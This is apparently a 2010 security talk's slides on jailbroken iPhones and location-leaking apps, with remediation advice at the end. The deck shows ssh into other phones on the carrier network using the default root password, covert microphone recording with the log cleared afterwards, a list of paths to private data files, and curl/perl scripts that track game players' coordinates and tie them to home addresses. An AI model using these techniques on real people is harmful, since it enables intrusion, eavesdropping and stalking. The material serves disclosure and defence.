Old Smartphone Best Practices








Bad 




Good 



New Smartphone Best Practices



IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.

Get iFart, it's hilarious. 




If AT&T is in attendance: 



Facts about AT&T and me:

• I enjoy my AT&T wireless service
  » Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
• Would love to chat




Jailbreaking

blackra1n

PwnageTool




It opens up a whole new world of applications:

• common Unix binaries
• sshd
• tethering
• pirate software

super easy to JB your phone




Impact on security



"Jailbreaking removes 80% of the iPhone's security precautions"

Charlie Miller, SyScan 2009



How many iPhones are jailbroken?



6.93% 



Piracy in the Appstore 




[Pinch Media chart: distinct devices we've counted that have been jailbroken: ~4.0M; distinct devices we've counted that have installed pirated apps: ~1.5M. Unique users by jailbroken phones (week of 5/17/09): 6.93% jailbroken phones vs. non-jailbroken phones.]

[1] http://www.slideshare.net/pinchmedia/piracy-on-the-appstore

Global Stats: Jailbroken Devices



ifconfig

root# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
        inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
        ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
        ether 0a:0b:ad:0b:ab:e0



Interfaces

en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
pdp_ip3 = used with tethering



ifconfig

pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff



sshd

[Screenshot: iPhone Dev Team forum post "iPhone Root Password Cracked", posted by sam, Chief of Administration, iPhone Dev Team]

We managed to obtain and crack the hashes of the user passwords for the iPhone OS.
Edit: cause you digg people broke the poor wiki:

The password for root is "alpine"

The "mobile" user account's password is "dottie"

Is it sick to have root password to all iPhones worldwide? Well not really, there is no



So what?

Until (about) October 16, 2009 AT&T did not filter device-to-device IP network traffic.



AT&T's Network 



Most people think it looks like this: 




AT&T's Network 



Actually, more like this: 




Multiple /16's 



Your smartphone (and laptop, BlackBerry, etc.) has been on one giant flat network...



So I started looking around... 



Scans

[Chart: scanned IP ranges]

Devices On the Network

0,589* IPs scanned



Count   Port    What?
83      22      sshd
24      80      http
4       2008    PDANet
3,644   62078   iPhone Default



Other stuff out there

• Saw a Linux box with sshd
• Windows Mobile devices
• Blackberries
• Windows PCs

PDANet for the iPhone is an open proxy.



[Screenshot: Firefox showing the "PdaNet Registration - unlock full version" page served by a phone on the carrier network (email address / serial number form; "PdaNet is currently running in trial mode (8 days left). Please paste serial number from your order receipt email"); the status bar reads "Proxy: SSH Tunnel"]



ssh access between phones

Trevors-iPhone:~ root# ssh root@10.69.62.100
Password: [alpine]
Nates-iPhone:~ root#
Nates-iPhone:~ root# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)



Filesystem Guide

Interesting stuff:

/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)
/private/var/mobile/Library/SMS - SMS Text Messages
/private/var/mobile/Library/Voicemail - Voicemail in .amr format
/private/var/mobile/Library/AddressBook - Contacts
/private/var/mobile/Library/CallHistory - Call History
/private/var/mobile/Library/Notes - Notes

/private/var/mobile/Library/CallHistory/call_history.db
/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
/private/var/mobile/Library/AddressBook/AddressBookImages.sqlitedb
/private/var/mobile/Library/Cookies/Cookies.plist
/private/var/mobile/Library/Keyboard/dynamic-text.dat
/private/var/mobile/Library/Mail/Accounts.plist
/private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
/private/var/mobile/Library/Mail/(mail account name)/Sent Messages
/private/var/mobile/Library/Mail/(mail account name)/INBOX
/private/var/mobile/Library/Maps/History.plist
/private/var/mobile/Library/YouTube/Bookmarks.plist
/private/var/mobile/Library/Voicemail/(amr files)
/private/var/mobile/Library/Voicemail/voicemail.db
/private/var/mobile/Library/Safari/Bookmarks.plist
/private/var/mobile/Library/Safari/History.plist
/private/var/mobile/Library/Suspend.plist
/private/var/mobile/Library/Safari/SuspendState.plist
/private/var/mobile/Library/Safari/SMS/sms.db
/private/var/mobile/Library/Preference/(various preference Plists)
/private/var/mobile/Library/Notes/notes.db



Let's do a bit more

Erica Utilities - cmd line utilities for the iPhone

recAudio: Record audio from the onboard microphone.

findme: Queries the iPhone's GPS API to return latitude/longitude



[Diagram: Attacker (10.69.62.220) pushes recAudio to Victim (10.69.62.100) and pulls back recording.aiff: "can hear you typing"]

Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:
Password:
recAudio                                      100%   19KB   1.3KB/s   00:00
Trevors-iPhone:~ root# ssh root@10.69.62.100
Password:
Nates-iPhone:~ root# ./recAudio
Start talking. Press ^C to finish.
Starting recording
^C
Interrupted.
Stopping recording

Nates-iPhone:~ root# ls -l *.aiff
-rw-r--r--  1 root  wheel  43178 Oct  2 22:35 2009-10-02\ at\ 22:35:04.aiff
Nates-iPhone:~ root# mv 2009-10-02\ at\ 22:35:04.aiff test.aiff
Trevors-iPhone:~ root# scp root@10.69.62.100:~/*.aiff .
Password:
test.aiff                                     100%  523KB   2.2KB/s   00:00
Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
Nates-iPhone:~ root# last
wtmp begins at Fri Oct  2 22:41
Nates-iPhone:~ root#



Other bad things

./openURL tel://1-900-XXX-XXX
./openURL tel://911 or tel://mynumber
Pillage filesystem: email, sms, notes, app data, etc.
apt-get install tcpdump nmap
go wild on whatever network en0 is connected to.



Worms and Exploits

Dutch Extortion

[Screenshot: T-Mobile NL iPhone showing the message "Important warning: Your iPhone's been hacked because it's really insecure! Please visit doiop.com/iHacked and secure your iPhone right now! Right now, I can access all your files. This message won't disappear until your iPhone is secure" (Dutch "ontgrendel" = unlock)]

November 2009

ikee worm

[Screenshot: Batman from the Whirlpool forums]

November 2009

Exploits

iPhone/Privacy.A* command line tool
iPhone/iBotNet.A* worm with C&C

* Discovered by security firm Intego



Some good news

AT&T does segment part of their network:

• e.g. I could not see friend in CA from DC
• But I could see friend in Boston

No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)

• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn't really work in Mobile Safari (Man this is slow...)



email to ID user

<img src="http://10.69.62.220/i.jpg">

[Diagram: the image request from the phone at 10.69.63.110 arriving at the web server at 10.69.63.220:80 (src: 10.69.63.110, dst: 10.69.63.220)]



What to do

Don't Jailbreak your phone if you care about security (sorry)

Change root and mobile users' passwords

Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install

IT Folks: Policy on jailbroken iPhones

AT&T: Filter mobile to mobile IP traffic
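One way to act on the sshd advice above, as an added example that is not from the deck: parse ifconfig output in the format shown earlier, report the addresses sitting on the cellular pdp_ip interfaces, and emit sshd_config ListenAddress lines for the remaining non-loopback interfaces so sshd never listens on the carrier side. The sample ifconfig text is constructed to mirror the slide, and the function names are my own.

```shell
#!/bin/sh
# Added example (not the deck's code): derive a safe sshd ListenAddress set
# from ifconfig output, keeping sshd off the carrier (pdp_ip*) interfaces.

# Constructed sample, mirroring the ifconfig output shown on the slides.
SAMPLE_IFCONFIG='lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
        inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
        ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
        ether 0a:0b:ad:0b:ab:e0'

# Print "iface addr" for every inet line, remembering the interface header
# (a line that starts with a name and a colon) that precedes it.
iface_addrs() {
    printf '%s\n' "$1" | awk '
        /^[a-z_0-9]+:/ { iface = $1; sub(":", "", iface); next }
        $1 == "inet"   { print iface, $2 }'
}

# Addresses on cellular interfaces: anything bound here is reachable from
# other handsets on the carrier network, which is the exposure the talk shows.
cellular_addrs() {
    iface_addrs "$1" | awk '$1 ~ /^pdp_ip/ { print $2 }'
}

# sshd_config lines that restrict sshd to Wi-Fi/other non-cellular addresses
# (loopback excluded; add it back if local-only tools need it).
sshd_listen_lines() {
    iface_addrs "$1" | awk '$1 !~ /^pdp_ip/ && $1 != "lo0" { print "ListenAddress " $2 }'
}

echo "Exposed on cellular interfaces:"
cellular_addrs "$SAMPLE_IFCONFIG"
echo "Suggested sshd_config entries:"
sshd_listen_lines "$SAMPLE_IFCONFIG"
```

Run it against live output with `iface_addrs "$(ifconfig)"`; the ListenAddress lines replace the default listen-on-everything behaviour that put port 22 on 10.x.x.x in the scans above.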



Privacy and Location Based Apps

Location Based Apps

Underworld: Sweet Deal
Drug trafficking game with candy
Location matters, move product from point A to point B
Phone sends high resolution coordinates to game server



Like Druglords

[Screenshots: Underworld: Sweet Deal in-game player list showing nearby players' names, ranks and cash, each tagged with a location (e.g. Carters, Loudoun County; University Park, Centre County, Pennsylvania), and the same positions plotted on Google Maps]



Paros

Client side proxy
Configure the iPhone to use the IP address of the machine running Paros as its proxy
Watch what your apps send and receive



Request (Paros)

POST http://game.dl.a-steroids.com/TrafficServer/ HTTP/1.1
Host: game.dl.a-steroids.com
User-Agent: Underworld%20premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3 Paros/3.2.13
Cookie: JSESSIONID=ED3E0CF7A73D3A376023E47E2C650737; Path=/
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Connection: keep-alive
Proxy-Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<Commands><Command><type>GET_GMAP_OBJECTS</type></Command></Commands>


Response (Paros)

HTTP/1.1 200 OK
Date: Sun, 24 Jan 2010 21:20:21 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny2 with Suhosin-Patch
X-Powered-By: Servlet 2.4; JBoss-4C5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<Updates><Update><type>GMAP_OBJECTS</type><radius>510</radius><players><pl><id>289392</id><flag>true</flag><name>[redacted]</name><status>Mobster (17)</status><lat>39.12297058105469</lat>...<type>0</type></pl><pl><id>323104</id><flag>true</flag><name>ShadyWays</name>...<lon>-77.54315948486328</lon><type>0</type></pl><pl>...



[Screenshot: the player's lat/lon pasted into a Google Maps query (maps.google.com/maps?q=<lat>,<lon>) plots their position on the map]



Let's pick a non-intel agency player

[Screenshot: one entry from the in-game player list, with its location tag (Carters, Loudoun County)]






Lat/Lon to GMaps:

County Records

[Screenshot: Loudoun County "Real Estate Assessment - 2009, Owner and Legal - Residential" record for the parcel at the plotted coordinates: current owner name and address, most recent sale price and date, land/improvement/total assessment, state use classification URBAN SINGLE FAMILY, billing and election district DULLES]
Facebook

[Screenshot: the owner's Facebook profile (profile.php?id=...) found from the county record: "Pat only shares certain information with everyone. If you know Pat, add him as a friend on Facebook."]



Ok neat, what else?

Near real-time geolocation tracking of players

cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots



curl script

#!/bin/sh
#
# First login...
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
     -d @/home/trevor/iphone/login.xml \
     --dump-header /home/trevor/iphone/headers.txt \
     http://game.dl.a-steroids.com/TrafficServer/
#
# Then update location (reusing the session cookie saved by --dump-header)
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
     -b /home/trevor/iphone/headers.txt \
     -d @/home/trevor/iphone/update_loc.xml \
     http://game.dl.a-steroids.com/TrafficServer/
#
# Get GMap objects
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
     -b /home/trevor/iphone/headers.txt \
     -d @/home/trevor/iphone/gmap_update.xml \
     http://game.dl.a-steroids.com/TrafficServer/



perl script

#!/usr/bin/perl

use strict;
use warnings;

# make single or multiline input into one scalar
my $glob = join('', (<>));

# extract one <name>...</lon> record per player
my @records = $glob =~ /(<name>.*?<\/lon>)/ig;

for (@records)
{
    my ($name, $lat, $lon) = $_ =~
        qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|i;
    print "$lat,$lon,$name\n";
}



perl script output

[Screenshot: the CSV output converted to KML and plotted in Google Earth over the District of Columbia (imagery ©2010 Google, DC GIS)]



Comments/Feedback: 

trevor.hawthorn@stratumsecurity.com 

www.stratumsecurity.com 

Twitter: 
@packetwerks 
stratumsecurity 




Special Thanks: Tiago Stock 



